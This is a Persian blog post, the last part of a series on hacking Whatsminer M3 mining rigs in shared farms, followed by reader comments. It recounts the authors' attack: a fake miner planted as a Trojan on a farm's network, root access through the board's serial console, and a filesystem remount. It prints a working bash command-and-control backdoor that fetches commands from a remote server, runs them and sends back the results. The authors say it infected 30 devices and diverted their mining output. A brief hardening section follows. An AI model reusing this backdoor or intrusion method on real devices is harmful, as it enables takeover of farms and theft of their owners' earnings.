( هک ماینر – قسمت سوم پایانی)
در قسمت قبل مقاله(عملیات غیرممکن – نفوذ به مزرعه) یک سری توضیحات اجمالی در راستای هک ماینرهای M3x دادیم که البته قابل بسط به دیگر انواع ماینر نیز هست و به سادگی با الگو برداری از آن قادر خواهید بود هر نوع دستگاه ماینرها را هک کنید؛ اما واقعا یک شبه ما به این توضیحات دست پیدا نکریم و فکر میکنم برای کامل تر شد مقاله لازمه بیشتر در خصوص مسیر طی شده توضیح بدیم ، مثلا این که چی شد که نرم افزار CGMinger رو پیدا کردیم یا این که چی شد تونستیم وارد سیستم عامل ماینر ها بشیم، در این مقاله بیشتر به این موضوعات خواهیم پرداخت و میدونم که برای خیلی ها میتونه جذاب باشه چرا که دریچه ای به هک سخت افزار های سیستم عامل دار باز میکنه که ماینرها یک بخش کوچک از دنیای بزرگ این مدل سخت افزارها هستند، به روترها و گجتهای الکترونیکی مدرن فکر کنید که با این مدل هک چه تغییراتی نمی شود در آنها اعمال کرد. خوب اجازه بدهید پرحرفی رو کنار بگذاریم و مقاله رو شروع کنیم.
ایده پردازی برای هک ماینر
همه چیز با یک سوال ساده شروع شد:
ممکن است جواب این سوال برای خیلی ها یک «نمی شود» ساده باشد ولی وقتی قرار است سیستمی را هک کنید نباید خیلی ساده از مسائل گذشت، همانطور که ما هم نگذشتیم و جواب سوال را پیدا کردیم 🙂
در واقع پایه و اصول هکی که قصد انجام آن را داشتیم بر دو چارچوب اساسی سوار بود:
- ساده انگاری صاحبان دستگاه و استفاده از یوزر و پسورد پیشفرض
- ساختار حاکم بر فارمهای موجود در ایران (عدم ایزوله سازی دستگاه ها از هم)
با کنار هم قرار گرفتن این دو مساله به سادگی قادر خواهیم بود کنترل تک تک دستگاههای موجود در یک فارم را تحت کنترل خودمان در بیاوریم. اما چطور چنین چیزی ممکن است ؟
فرض کنید به طریقی در شبکه محلی یک فارم (LAN) وارد شده باشیم به سادگی با یک آیپی اسکن ساده قادر خواهیم بود لیست دستگاه های موجود در شبکه را به دست بیاوریم و از آنجایی که پسورد و نام کاربری تمام دستگاه ها همان نام کاربری و پسورد کارخانه است میتوان وارد پنل مدیریت آنها شده و آدرس استخر ها را عوض کنیم یا هر تغییر دیگری که دلخواه باشد را اعمال کنیم.
شاید برای شما مفید باشد: ساخت دستگاه ماینر
تا اینجا که مساله بسیار ساده است ، اولین سوالی که باید به آن پاسخ داد نحوه ورود و گرفتن دسترسی به یک فارم است ! اینجاست که ایده اسب تروآ مطرح شده ! اگر ماجرای اسب تروآ رو نمیدونید توصیه میکنم به این لینک مراجعه کنید و از ماجرا سر در بیارید در دنیای هک کامپیوتر تروجان ها درواقع دقیقا از همین شیوه استفاده می کنند.
ساخت اسب تروآ برای هک ماینر
در واقع ایده اولیه اینه که ما یه دستگاهی که شکل ظاهریش مثل دستگاه ماینر است ولی باطنش یه چیز دیگه است (مثلا یه کامپیوتر) به یه فارم تحویل بدیم و منتظر باشیم که دستگاه نصب بشه و راه ارتباطی ما با شبکه لوکال فارم باشه. با وجود مینی کامپیوتر های مبتنی بر ARM ساخت چنین دستگاهی نباید کار سختی باشه، تنها کاری که باید انجام بدیم اینه که داخل یه جعبه ماینر مثلا یه رزبری پای جاسازی کنیم.
شاید برای شما مفید باشد: آموزش رزبری پای از 0 تا 100
فارغ از ظاهر دستگاه مساله ای که ممکنه باعث لو رفتن اسب تروآ بشه اینه که فارم دار بخواد وارد پنل مدیریت اسب تروآ بشه و بخواد اونو کانفیگ کنه که دقیقا مساله ساز میشه! چرا که پنل مدیریتی نداریم اگر هم بخوایم بسازیم احتمالا زمان زیادی خواهد گرفت با توجه به هیجانی که داشتیم برای انجام هرچه سریعتر کار زیاد معقول نبود.
خوب چه کار دیگه ای میشه کرد – یکی از دوستان اتاق فکر ایده داد که یه سوئیچ داخل دستگاه جاساز کنیم که هم برد خود ماینر باشه و هم میکروکامپیوتر هکر ما ! خوب ایده بدی نبود ولی با توجه به محدودیت فضای موجود توی قسمت کنترلر ماینر شاید انجامش زیاد معقول به نظر نمی رسید. تا این که ایده طلایی به ذهنم رسید ?
دوستان زیاد موافق نبودن و به نظرشون شدنی نبود که بخوایم فریمور یک برد سیستم عامل دار رو هک کنیم، یا فکر میکردند اگر هم شدنی باشه اینقدر پیچیده خواهد بود که کار بسیار زمانبری است. اما به نظر من با توجه به ساختار لینوکس کار نباید اینقدر ها هم سخت باشه ! با این قرار از هم جدا شدیم که من برم بررسی کنم ببینم چطور میشه و این که آیا اصلا میشه فریمور Mainboard دستگاه رو هک کرد. ماینر هدف هم همون ماینری بود که همه ازش دارن یعنی Whatsminer M3.
هک فریمور دستگاه Whatsminer M3
عکس بالا در واقع برد کنترلر دستگاه Whatsminer M3 است ، چیزی که روی برد مشخصه اینه که با یه SoC طرف هستیم که احتمالا لینوکس رو از روی NAND (همون آیسی بالای عکس که دو طرفش پایه داره و مستطیل شکل است) فلش داره بوت میکنه ! خوب این که بخوایم آیسی فلش رو دمونتاژ کنیم و اطلاعات داخل اونو بخونیم با توجه به پیچیدگی هایی که داره در واقع آخرین کاری هست که قصد داریم انجامش بدیم، اما با نگاه کردن به برد چیزهایی دیگه ای هست که ما رو به عنوان یک الکترونیکی قلقلک بده.
شاید برای شما مفید باشد: آموزش FPGA
و اون چیزی نیست جز مشاهده عبارت TX و RX روی پین هدر ۳ پایه J8 کنار خازن های الکترولیت؛ این دو عبارت برای ما مثل پیدا کردن رمز سیستم کامپیوتری است برای هکرهای نرم افزار ! بله دیگه دنیای ما هم این شکلیه، در واقع ارتباط سریال برای تبادل داده از این دو پایه استفاده میکنه – و حدس من این بود که طراح سیستم برای رفع عیب و احتمالا ارتقاء سیستم باید از این رابط استفاده کنه! اما چطور میشه فهمید ؟ به سادگی اتصال یه مبدل یو اس بی به سریال و نرمافزار screen برای ما لینوکسی ها و putty برای شما ویندوزی ها.
الان همه چیز آماده است و برای دیدن نتیجه باید سیستم رو روشن کرد، معمولا باوود ریت پیش فرض سیستم ها ۱۱۵۲۰۰ است که ما هم اول با همین باوود چک میکنیم اگر دیتایی دریافت نکردیم باوود های دیگه رو چک میکنیم ؛ یا این که همون اول میتونیم به سراغ لاجیک آنالایزر بریم و سعی و خطا رو کنار بگذاریم 🙂
تصویر بالا نشون میده که حدسمان درست بوده و کنسول دیفالت لینوکس دقیقا روی همین پورت سریال تنظیم شده است و اتفاقا دسترسی به root سیستم هم دارد – گام اول به خوبی برداشته شد و دسترسی به سیستم حاصل شد بعد از بررسی ها مشخص شد که سیستم از پلتفرم OpenWRT استفاده میکنه که خوشیمان را دو چندان کرد ، این یعنی این که سیستم پک منیجر هم در اختیار داریم 🙂
تقریبا تا اینجای ساخت اسب تروآ خوب پیش رفته و مشخص شده که با لینوکس طرف هستیم دسترسی به یوزر اصلی سیستم رو هم داریم و این یعنی هر ان چیزی که برای تغییر لازم داریم رو در اختیار خواهیم داشت در ضمن مشخص شد که سرویس dropbear هم روی سخت افزار در حال اجراست که ما را از اتصال هر باره پورت سریال بی نیاز می کند و به سادگی با ssh قادر هستیم به سیستم وصل شویم.
در این مرحله لازم بود که مجددا اتاق فکری تشکیل شود و راهکار های احتمالا را بررسی کنیم. الان در واقع میتوان گفت که یک سیستم آماده داریم که به سادگی میشود آن را به اسب تروآ تبدیل کرد – اما سوال کلیدی این است که درون این اسب چه جنگ افزار هایی باید قرار گیرد ؟
اتاق فکر و بروزرسانی ایده اولیه
بگذارید اشاره کنم در زمانی که در حال گشودن قفل های سخت افزار بودم دیگر دوستان بیکار ننشسته بودند و ایده های نرم افزاری خودشون رو پیش می بردند ! در واقع نرم افزاری رو نوشته بودند که به صورت خودکار در دستگاه Whatsminer M3 لاگین میکرد، آدرس استخر های ماینیگ رو عوض میکرد و دستگاه رو ریست میکرد و این کار رو به شکل دوره ای انجام میداد مدتی هم نرم افزار رو زیر بار گذاشته بودند و جواب مطلوبی هم گرفته بودند. اما مشکل کجاست ؟
مشکل اینجا بود که سایت های استخراج نظیر BTC وقتی دستگاهی از استخرش جدا میشه به کاربر اطلاع میده، یعنی با ارسال یک پیامک میگه فلان دستگاه قطع شده که خوب در واقع پاشنه آشیل این هک از این قرار بود که کاربر متوجه هک نشه ! پس این راه حل جامع مورد نظر نبود خوب ایده های دیگه ای مطرح میشد که هر کدام به شکلی دچار مشکل بودند.
راه حل اولیه ای که به ذهنم رسید این بود که ترافیک تمام ماینرها رو به سیستم خودمون منتقل کنیم و ما به عنوان پاراکسی پروتکل Stratum را پیاده سازی کنیم که در واقع بتونیم لابلای کارهای اصلی کار خودمون رو هم بدیم ماینر انجام بده ? اما باز مشکلی وجود داشت، اول این که پیاده سازی Stratum کار ساده ای نبود و سمپل پراکسی آماده ای هم براش پیدا نکردم و مهم تر از همه موقعیت اسب تروآ رو لو میداد (پیدا کردن آیپی gateway) چیزی که اصلا ما دنبالش نبودیم.
یه راه دیگه این بود که کانفیگ یکی از هش بردهای دستگاه رو از روی CGMiner برداریم به نحوی که فکر کنه این هش برد اصلا وجود نداره و یک CGMiner دومی بر روی سیستم عامل اجرا کنیم که کارهای ما رو با این هش برد انجام بده، اما اشکال این بود که یک سوم توان دستگاه کم می شد! خوب BTC اطلاع نمیداد که دستگاه قطع شده ولی اگر کاربر خودش چک میکرد متوجه میشد یکی از هش برد ها خراب شده و احتمالا دستگاه رو برای تعمیر از فارم خارج می کرد و رشته های من کلا پنبه میشد.
پس راه حل چی میتونست باشه ؟
کامپایل مجدد سیستم عامل یا نرم افزار استخراج ارز دیجیتال بیت کوین به نحوی که علاوه بر لینک های ورودی از یک منبع دومی هم ورودی بگیره و درصد خیلی کمی که خیلی هم محسوس نباشه رو به ورودی دوم اختصاص بده – خوشبختانه CGminer متن باز است و سورسش هم در دسترس همگان و البته امیدوار باشیم که شرکت Whatsminer سورس رو کاستوم نکرده باشه!
اما قبلا به بررسی های کلید های ورودی CGMinner پرداختیم تا ببینیم آیا خودش چنین امکانی رو داره اصلا یا نه ؟ که در کمال تعجب دیدیم که بله همچین امکانی بدون دردسر قابل تعریف است (جزییات بیشترش رو قسمت دوم مقاله میتونید پیدا کنید.) – و چی بهتر از این.
آماده سازی اسب تروآ
حالا که ابزار و روش حمله مشخص شد باید بتونیم اسب تروآ رو آماده کنیم ! که به یه مساله جدید برخورد کردیم :/ فایل سیستم های موجود بر روی دستگاه ماینر یا توی رم mount شده بودند یا این که ReadOnly بودند.
که خوب ممکن بود کار پیش رو را بسیار دشوار کند، ولی به لطف لینوکس و فایل سیستم ext4 با دستور زیر فایل سیستم رو مجددا در حالت خواندنی نوشتنی mount کردم 🙂
1 | mount -o remount,rw /dev/nandd / |
خوب بعد از این مرحله اسب ما آماده نصب ابزار های جنگی خود است تا به فتح مزارع ماینر بپردازد.
دسترسی از پشت NAT !
بعد از آماده سازی اسب تروآ لازمه که از طریقی باهاش در ارتباط باشیم و دستور های لازم رو از مرکز کنترل صادر کنیم که مثلا کی و چطور به کدوم دستگاه حمله کنه ! احتمالا ایدهال ترین حالت داشتن دسترسی ssh است ولی همونطور که میدونیم اینترنت توی شبکه لوکال به شکل NAT در دسترس خواهد بود و داشتن ارتباط ssh بدون دردسر غیر ممکنه برای همین بعد از کلی ایده پردازی به سراغ پیاده سازی سیستم C2 (command and control) رفتم و با کمک Bash اسکریت بسیار محدود روی openwrt یه اسکریپت قابل قبول توی زمان معقولی نوشتم (حدود یکی دو ساعت با پیاده سازی سمت سرورش) ! و نتیجه کد زیر بود
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | #!/bin/bash #in openwrt need install "coreutils-base64" #All Command Code to Base 64 HOST=http://xyz.com/pull.php macstr=$(ifconfig eth0 | grep -o -E '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}') mac=${macstr//:/} hostname=$(cat /proc/sys/kernel/hostname) data="mac=$mac&host=$hostname" code=$(wget -qO- "$HOST" --post-data $data) cmd=$(echo $code | base64 --decode) index=$(awk -v a="$cmd" -v b="^" 'BEGIN{print index(a,b)}') Cid=${cmd:0:$(( $index-1 ))} Ccm=${cmd:$index:95555} if [ 0 -ne $Cid ] then res=$(echo "$($Ccm)" | base64) exc=$(echo $res | tr -d ' ' | tr -d '\n' | tr -d '\r') Rdata="id=$Cid&res=$exc" res=$(wget -qO- "$HOST" --post-data $Rdata) echo $res fi |
که از مرکز کنترل (که با php نوشتم) دستوری رو برای اجرا بر روی دستگاه میگیره و جواب رو به سرور برمیگردونه!
هر دستگاهی هم بر اساس مک شبکه از باقی دستگاه ها جدا میشه و بعد از الوده شدن به این اسکریپت خودش به یک اسب تروآ تبدیل میشه 🙂 و احتمالا در صورت ادامه ارتشی رو خلق خواهد کرد از دستگاه های ماینر که علاوه بر ماین کردن احتمالا کاربرد دیگری نیز خواهند داشت (احتمالا هکر ها منظورم رو متوجه خواهند شد).
وظیفه شناسایی و آلوده کردن دیگر دستگاه ها از سمت مرکز کنترل مدیریت میشه ! که بعد از حدود یک ساعت فعالیت ۳۰ دستگاه از نوع m3 رو آلوده کرد !!!!
و این بود سر انجام هک دستگاه ها و فارم های ماینر !!
چطور از هک ماینر و فارم جلوگیری کنیم!
ما از ارائه این مطلب دو هدف عمده را دنبال میکنیم اول اینکه موضوع هک یک موضوع کاملا جدیه و اینکه بگیم که چطوری میشه از نفوذ هکر های بالقوه جلوگیری کنیم, هکرهایی که میتونند به فارم یا دستگاههای شما نفوذ کنند و حاصل زحمت شما را به راحتی به سرقت ببرند, که من در اینجا به چند مورد اولیه و ساده اشاره میکنم. ( در ضمن ما در سه مقاله سعی کردیم از ارائه فوت های کوزه گری جلوگیری کنیم تا خدای ناکرده این مقاله ها نتونه کمک کننده به افراد سودجو باشه 🙂 )
اول اینکه حتما سعی کنید موارد مربوط به شبکه و اصول اون را درست پیاده سازی کنید و به هیچ عنوان اگر اطلاعات دقیق ندارید سعی نکنید خودتون شبکه ای را راه اندازی کنید و دسترسی هم به افراد غیر معتمد به هیچ عنوان ندهید, افرادی که میتونند با یک ساعت در شبکه شما بودن ارتباط کاملی در اینده بین خودشون و فارم شما ایجاد کنند و حاصل دسترنج شما را به یغما ببرن! ( این هم یکی از خواص ویژه بیت کوین و کلا ارزهای دیجیتال هست)
حتما کلمه عبور های سیستم و پسورد یوزرهای ادمین را عوض کنید تا افراد به سادگی نتونن به سیستم شما نفوذ کنند.
به هیچ عنوان اجازه ورود هر دستگاه ماینری را به مزرعه خودتون ندید.
همیشه سعی کنید کلیه دستگاههای خودتون و عکس العمل های اونها را مانیتور کنید و در صورتیکه هر گونه تداخل یا مشکلی دیدید اونها را دقیق بررسی کنید!
در اخر لازمه این را بگم که وقتی به عنوان یک مهندس الکترونیک این داستان هک را میخونید متوجه خواهید شد که شما به عنوان یک متخصص این حوزه لازمه همزمان اطلاعات زیادی در حوزه های نرم افزاری هم داشته باشید و صد البته اگر در این حوزه ها همراهان نرم افزاری هم مثل ما داشته باشید متوجه خواهید شد که یک پروژه بزرگ چطور میتونه به خوبی ایده پردازی بشه و در اخر هم انجام بشه.
البته متاسفانه یا خوشبختانه یکی از اعضای تیم سیسوگ Meisam که عضو نرم افزاری تیم هک ماینر هم بود در راه آلمان هستند که امیدوارم هر جا هستند خوش و خرم باشند و مثل زمان حضورشون در ایران موفق و فعال باشن و سیسوگ را هم فراموش نکنن 🙂
که البته اواخر سال 99 مبلغی که در حین اجرای پروژه بصورت بیت کوین دراومده بود که البته اون موقع ناچیز بود به محک واریز کردند
سلام ، یک دستگاه دارم از شرکت whatsminer m21
با ssh متصل شدم به و صفحه busybox رو دارم
ولی مشکلی که هست نمیتونم کانفیگ cgminer رو ببینم و کلا همه فایل ها read-only هستند
وقتی میخوام mount کنم ، خطا میده are you root ? در صورتی که با یوزر روت وارد شدم
کلا نمیزاره کاری انجام بدم
سلام
تجربه ای با این مدل ماینر نداشتم ولی اگر پوزر روت نتونه پس کی میتونه ، باید ببینید چطور مییشه تغییر داد و حتما راهی هست
سلام
ممنون از اطلاعات و مقاله خوبتون
سوال اینکه
چطور میشه از طریق uart کنترل بردی که فریمورش خراب شده و با میکرو اس دی دانگرید نمیشه رو پروگرام کرد؟
ممنون میشم راهنمایی کنید
سلام دوست عزیز
وقتی فریمور اصلی اونطور صدمه دیده کا فانکشنالیتی خودش رو از دست داده عملا دیگه از طریق uart نمیشه کاری کرد و حتما نیازه که از طریق یه پروگرامر فایل اصلی فریمور روی آیسی فلش پروگرام بشه
سلام
ممنون از اطلاعات خوبتون
سوال من اینه که چطور میشه از طریق uart کنترل بردی که فریمورش خراب شده رو پرو گرام کرد؟
ممنون میشم راهنمایی کنید
سلام مجدد زِئوس جان
میدونم پست مربوط به خیلی وقت پیشه اما اگر جواب بدی ممنون میشم
بعد از اینکه ssh وارد شدیم و به حالت قابل خواندن تغییر دادیم پطور برسیم به قسمت سوییچ balance که استخخرهایی که اضافه شده بتونیم پاک کنیم و درصد 100 درصد به ادرس اصلی بدیم؟
ممنون
سلام دوست عزیز 🙂
یکم که با ساختار تنظیمات و حمل نگهداری اون مدل ماینر آشنایی داشته باشید خیلی راحت میتونید این کار رو انجام بدید
اگر منظورتون اصلاح ویروسی شدن هست فکر کنم با ریست فکتوری درست بشه
در حال تلاش هستم 😀
هنوز نفهمیدم چطوره
فکر کنم اول باید برم لینوکس یاد بگیرم 😀
بسیار عالی
بله دانستن ساختار لینوکس خیلی کمک میکنه
زئوس همیشه مومن سلامی به گرمی هشبرد های m3
سوال فنی !
کلی این cgminer و فایل ها زیر رو رو کردم و کل فایل های موچود روی m3 رو خوندم به اضافه ی سورس cg
سوال فنی: ایا pool1url_$ به معنی url– هست ؟
سلام دوست عزیز
والا من الان حضور ذهن ندارم ولی از اسمش به نظر میآد آدرس اسخر باشه دیگه :/
زئوس من تورو میپرستم تو خداوندگار منی ننگ بر کریتوس ملعون
سلام
خیلی جالب بود.
منم همین مشکل دارم که افت هش ریت پیش میاد و خود صفحه ماینر ترا هش بالا میده اما همون مقدار به استخر نمیرسه و استخر کمتر نشون میده.
با دانگرید. و رفرش هم حل نشد.
به همین مناسبت بر آن شدم که این روشی که گفتید برم تا حداقل خودم راه نفوذ بتونم ببندم 😀
البته بر خلاف علاقه سرشاری که به IT و کلا فناوری دارم در زمینه برنامه نویسی حرفی برای گفتن ندارم .خخخخ جملاتم ادبی شد.
بزرگوار زئوس چندتا مشکل برخوردم
اول اینکه این تبدیل ttl به usb دقیقا همین مدل پیدا کرذم اما شما ترتیب سیم ها انگار توی تصویر اشتباه وصل کردی
جای tx و dx برعکس وصل کردی
من هر کاری کردم نتونستم از طریق پرت سریال و برنامه. Putty وارد قسمت ssh بشم. برنامه ip میخواد که نمیدونم از طریق پرت سریال چی وارد کنم.اون باوود ریت هم پیدا نکردم چطور باید وارد کنم ۱۱۵۲۰۰ هم جای ip وارد کردم جواب نداد.
مشکل دوم :
از طریق لن به ssh وارد شدم و با کد خودتون قابل خواندنش کردم
حالا چطور باید به قسمت سوییچ balance دست پیدا کنم؟
که اگر قبلا یکی استخری اضافه کرده باشی پیدا کنم؟
حالا اگر پیدا کردم چطور درصد ها رو به ۱۰۰ درصد استخر خودم و صفر درصد مابقی استخر ها تغییر بدم؟؟؟
سوال سوم
عاشق این خلاقیت ها و کارای برنامه نویسی هستم از کجا و کدوم زبان شروع کنم؟ پایتون خوبه؟
پیشاپیش تشکر بابت پاسخگویی بزرگوار زئوس و دوستان
سلام دوست عزیز
امیدوارم که حالت خوب باشه، در خصوص جابجایی پایه ها ممکنه بردهای مختلف ترتیب های مختلفی داشته باشن باری به هر جهت شما در نهایت تونیسید وصل بشید
چقدر مفاوت هست ؟ هش ریت تا ده درصد اوکیه و به مواردی مثل شبکه و فی استخر برمیگرده پس احتمالا هک نشدید !
در خصوص کلید لود بالانس به شکل پیشفرض اعمال نشده و صددرصد هش ریت به اسخرهایی که شما تنظیم کردید اخصاص داده میشه مگر این که مثلا توی دستور top نگاه کنید و ببینید ماینر که ران شده این کلید رو در پارامترها دریافت کرده
در خصوص علاقه شما، کنجکاوی کردن بهترین گزینه است، برنامه نویسی خیلی کمک میکنه حتما پایتون هم برای شروع برنامه نویسی خیلی خوبه
موفق و پیروز باشید دوست عزیز
مطلب خیلی جالبی بود.من با پورت سریال به Rx tx کنترل برد t2t نتونستم کانکت بشم .تنظیمات مربوط به پورت رو هم انجام دادم.
سلام وقتتون بخیر من ماینر +L3 دارم و فریمورش هک شده
دقیقا تمام چیزایی که گفتین رو ماینرم انجام شده، ابتدا یکی از هش بوردا از مدار خارج میشه کلا
بعد کلا آدرس استخرا هم عوض میشه.
حتی با ریست کردن و دوباره کانفیگ کردن هم درست نمیشه
فریمور رو چیکار کنم درست بشه لطفا کمکم کنین طلاهای زنم رو فروختم یک دستگاه خریدم اینم اینجوری بیچاره کرده مارو.لطفا از طریق ایمیلم بهم بگین چیکار کنم. ممنون
سلام دادش فیش یو س بی رو از کجا خریدی
البته این مبدل یو لس بی به ttl هست – معمولا توی فروشگاهی الکترونیکی میتونید تهیه اش کنید!
سلام
اتفاقا همین بلا عینا سر من اومده و کلا m3 ها تو فارم ویروسی شد…………..
دستگاه فوری پسوردشون عوض میشه یا کلا غیرفعال میشه یا تراهش کم میده و غیره و غیره …
یکی از دستگاه ویروسی بود واسه همین این طوری شد.. هر چی دانگرید می کردیم می زدیم باز وضع همان بود
پدرم در اومد تا درستشون کردم…………………
تو فریمور 2019 این مشکل پیش نمیاد چون ssh را بستند
سلام وقت شما بخیر. متشکر بابت مطلب مفیدتون. آیا امکان داره یک ماینر رو طوری برنامه ریزی کرد که به دلخواه یک عبارت sh256 رو یک مرحله به عقب برگردونه، یعنی به جای اتصال به استخر برای خودمون کار کنه و عبارت رو با شرایط خاص دریافت و نتیجه رو به ما بده ( البته بستگی به توان ماینر و تعداد اون مسلما زمان دریافت نتیجه متفاوت هست ) . در واقع کد نویسی یه استخر خیلی جمع و جور با تنها یک عبارت. اگر شما می تونید کمکم کنید خیلی لطف بزرگی به من کردید. من به آی دی تلگرامتون پیام دادم اگر امکانش هست پاسخ رو به ایمیل من ارسال کنید . متشکرم
سلام مطمئنا با درک تمام سخت افزار و نرم افزار میشه کاری کرد که ماینر ها وظائفشون را از ما بگیرن و انجام بدند
یه سوالی: الان اون 0.015 بیت کوینی که از فارم قرض گرفتید رو چی کردید؟؟
راستش دست میثم بوده و البته هنوز هست
اخرین بار هدف این بود که به محک کمک بشه ولی جدیدا باهاش صحبت میکنم میگه دارم تحریک میشم برش دارم 🙂 فکر کنم شرایط موجود بهش خیلی فشار اورده 🙂
سلام خسته نباشید جناب مهندس
بنده یه سورس Bash نوشتم که کار سورس اینه که رشته تصادفی تولید کنه
اولش با PHP نوشتم و روی PC تست کردم ولی سرعت تولید رشته تصادفیش خیلی پایین بود
طوری بگم که حدود 12 ساعت فقط تونست 2 میلیون بسازه
گفتم بیام با Bash روی ماینر بنویسم که سرعتش بالاتر باشه
نوشتم و جواب هم داد فقط سرعتش از سرعت PC هم پایین تر بود
میخواستم از حداکثر توان ماینرم( M3 ) استفاده کنم برای تولید رشته
چطور از سرعت هش ریتی که هش رو حدس میزنه بتونم توی سرعت تولید رشته ام استفاده کنم؟
ممنون میشم کمکم کنید
سلام دوست عزیز شما کدی که نوشتید فکر کنم فقط داره روی برد کنترلر ماینر کار میکنه و به شما جواب میده
برای انکار باید ببنید CGminer طبق چه پروتکلی فعال هست و شما یک برنامه بنویسید و مثل یک استخر سعی کنید به اون تسک بدید و جواب بگیرید
سلام و عرض ادب خدمت شما
بله درسته سورس روی کنترل بورد داره اجرا میشه.
ولی نرم افزار CGMiner ک روی ماینر نصب هست رو نمیشه کدهاش رو دید.
اومدم اپدیت جدید ماینرو گرفتم ک ببینم چطور به اسیک وصل میشه بازم چیزی نبود
حدس بنده اینه ک باید کسی ک برنامه نویسی PLC بلده انجامش بده
واقعیت خودمم از PLC سر در نمیارم.
اگه امکانش هست یه توضیح مختصری در مورد این مشکل بدید و بفرمایید ک آیا برنامه نویسی PLC راه حل مناسبی هست یا خیر؟
ممنون
فکر میکنم دارید راه رو اشتباه میرید دوست عزیز 🙂
نیاز شما ساخت رشته تصادفی اگر هست شاید راه های بهتری برای انجامش باشه
چه ریتی مد نظر شماست ؟
سلام خسته نباشید
من یه سورس Bash نوشتم با SSH ریختم روی ماینرم (M3)
کار فایل Bash که نوشتم اینه که یه سری رشته رندوم تولید کنه
چون اول روی لپ تاب با PHP نوشتم ولی سرعت تولید رشته پایین بود
گفتم بیام روی ماینر بریزمش که سرعتش بالا باشه
الان میخوام فایل Bash من مثل CGminer با سرعت بالایی Run بشه
یعنی با همون سرعت که توی ثانیه میتونه Hash SHA256 (Bitcoin)i تولید کنه .. همونطور رشته های منو که با Bash نوشتم تولید کنه
دقیقا باید چیکار کنم؟
اگر امکان داره کمکم کنید .. ممنونم
درود فراوان…حال من دستگاهی ک دارم m3x v2 وقتی شروع ب کار میکنه اصلا هیچی بالا نمیارره//چند تا تعمیر کار هم گفتن احتمالا هک شده.. در حقیقت بالا میاد ای پی اما واردش ک میشی هیچ مشخصاتی ندارع . همه گزینه ها خالی هستن..
احتمال هک شدن پایین هست من فکر میکنم
یه بار ریست فکتوری کنید اگر دست نشد احتمال این که آیسی حافظه اش مشکل پیدا کرده باشه هست و با عوض کردنش احتمالا مشکل حل میشه
سلام، دستگاهتون رو دانگرید کنید اوکی میشه
سلام
دستگاه ebang ebit e10.1
با كابل lan وقتي با putty وارد محيط ssh ميشم root رو مينويسم پسورد ميخواد
پسورد رو چجوري ميشه پيدا كرد؟
طريقه اتصال به كنترل برد رو ميشه توضيح بديد؟
با تشكر
سلام
بله همینطوره – من زیاد تلاش برای پیدا کردن پسوردش نکردم ولی یکی از روش های پیدا کردنش اینه که فایل فلشش رو بخونید و توی فایل سیستمش دنبالش بگردید . حتی ممکنه با پسورد نشه بهش لاگین کرد و لازم باشه کلید های ssh رو داشته باشید.
میشه خصوصی با شما در ارتباط باشم؟ خیلی ضروریه
سلام دوست عزیز – مشکلی نداره از طریق ایمیل مکاتبه کنید.
اگر ایمیلم رو ندارید – ایمیلتون رو بگید.
سلام
امكانش هست كه الگوريتم اتريوم را به ماينر ebang ebit e10.1 اضافه كنيم؟
با تشكر
سلام دوست عزیز امکان پذیر نیست 🙂
سلام جناب مهندس دستتون درد نکنه واقعا مطالبتون علمی هست یه سوال داشتم درباره اینکه آیا میشه از قطعات اوراقی دستگاه ماینر مثل برد کنترل و هش برد برای کاربردهای دیگه مثلا ساخت مینی کامپیوتر و یا هر چیز دیگه ای استفاده کرد اگه میشه لطفاً راهنمایی کنید.
سلام دوست عزیز خواهش میکنم
در مورد هش برد باید بگم چون چیپ ها فقط برای منظور انجام هش بهینه طراحی شدن – عملا هیچ کاربرد دیگه ای نمیشه براشون پیدا کرد.
اما در مورد برد کنترلر قضیه متفاوته – چون یه پردازنده arm دارن با مقدار قابل قبول از رم و حافظه فلش باید بگم که بله میشه روشون لینوکس نصب کرد.
ولی از اونجایی که خروجی تصویر ندارند باید با استفاده از tty یا همون پورت سریال خودمون بهشون وصل شد. ولی شدنی هست.
میدونم خیلی وقته از انتشار این مطلب میگذره ولی حیفم امد چیزی نگم
واقعا از این نبوغ تون به عنوان کسی که نرم افزار میخونه لذت برم
امیدوارم همیشه موفق باشید
ممنونم دوست عزیز 🙂
متشکرم
با سلام.
اگر امکانش را دارید در مورد کار بر روی تستر هش برد کار کنید
الان چینی ها درستش کردن و با زدن دگمه تست میگه که کدوم ردیف و ستون ای سی اش خرابه///
هم اینکه ایا با ارتباط سریال نوع خطاها و ای سی خرابه را میشه فهمید؟؟
سلام اتفاقا یه مدت داشتیم بهش فکر میکردیم ولی با بگیر و ببند هایی که پیش اومد بی خیالش شدیم و میدونم الان نمونه های چینی رو میتونید به قیمت خوب تهیه کنید.
سلام.
ایده خوبیه..
اما نگران نباشید با تعمیرکاران کاری ندارند.
بیشتر با عمده فروشان درگیرند
والا دیوار برو 10000 تا اگهی ماینر هست
…………………..
من خودم تعمیرکار بردهای صنعتی و الکترونیکی هستم… میخاستم تعمیرات ماینر را شروع کنم
البته پاورش قابل حله بعضا.. بیشتر بحثم سر هش برد هست
اما تستر های چینی را در سایت عالی اکسپرس دیدم متاسفانه یکم سخته از اونجا خرید کردن…..
فروشنده ایرانی سراغ داری؟؟ قیمت حدودی؟؟
…………….
در کل هر کی رو تسترش کار کنه ضرر نکرده…………
…………
بزار یه مثال بگم الان تو مملکت ما کم کردن کیلومتر خودرو غیرقانونی هست اما شرکت های دانش بنیان هستند که دارند تجهیزات نرم افزاری و سخت افزاری واسه این کار را می فروشند کسی هم تا حالا کاریشون نداشته..
……………..
با تشکر
سلام
بله حق با شماست تقریبا
البته خیلی موارد دیگه هم وجود داره
یک فروشنده هم سراغ دارم که تو چین هست و ایرانی
به ای دی تلگرام سیسوگ پیغام بدید تا لینکش را بهتون بدم
اون تسترهای چینی همان برد خود ماینر هستند که یک برد میکروپروسسوری دیگه روش سوار شده.. و نبوغشون هم در همونه……………. یکی تونایی اش را داشته باشه به احتمال قوی میشه ساخت
بله حق با شماست
سلام مهندس میشه از همین طریق فریمور رو هم کپی کرد از روی ای سی
اون احتمالا پیچیده تره ولی هر کاری رو میشه انجام داد
مساله هزینه و زمانه
سلام. ممنون از اطلاعات مفیدتون. اگر ماینر E10.3 بجای ۲۴ تراهش، استخراجش مدام کاهشی باشه و حتی به ۵ تراهش برسه و فارمر بگه هک شده، چاره ای داره؟ پیشنهاد فارمر فروشش هست، ممنون میشم راهنمائیمون کنید.
۵ دیگه خیلی مشکوکه
من تا حالا دستگاه e10 ندیدم که هک شده باشه – ممکنه هش برد مشکل پیدا کرده باشه و خودتون باید بررسی کنید
